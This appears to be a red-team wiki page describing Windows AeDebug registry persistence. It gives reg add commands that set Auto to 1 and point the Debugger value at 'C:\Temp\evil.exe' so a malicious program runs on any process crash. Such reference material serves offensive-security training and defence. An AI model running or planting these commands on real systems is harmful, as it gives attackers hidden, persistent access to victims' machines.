AEDebug Keys Persistence

Theory

AEDebug Keys is a persistence and backdoor technique that leverages the Windows registry's Debugger property to execute a specified executable when a process crashes. The level of access gained depends on the security context of the debugged process. Additionally, if the Auto property of the same registry key is set to 1, the debugger launches automatically without requiring user interaction, further enhancing persistence.

A value of C:\Windows\system32\vsjitdebugger.exe might be seen if you have Visual Studio Community installed.

Practice

By editing AEDebug, the original debugger exe will not start

You can run a malicious code instead of the debugger by editing Auto and Debugger values under following keys:

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug
HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug

# Starts without user interaction
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ  /d "1"
# Edit debugger
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Debugger" /d "C:\Temp\evil.exe"

#Or

# Starts without user interaction
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "1"
# Edit debugger
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Debugger" /d "C:\Temp\evil.exe"

Resources

Beyond good ol’ Run key, Part 4Hexacorn

AeDebugpersistence-info.github.io

Last updated 10 days ago

Was this helpful?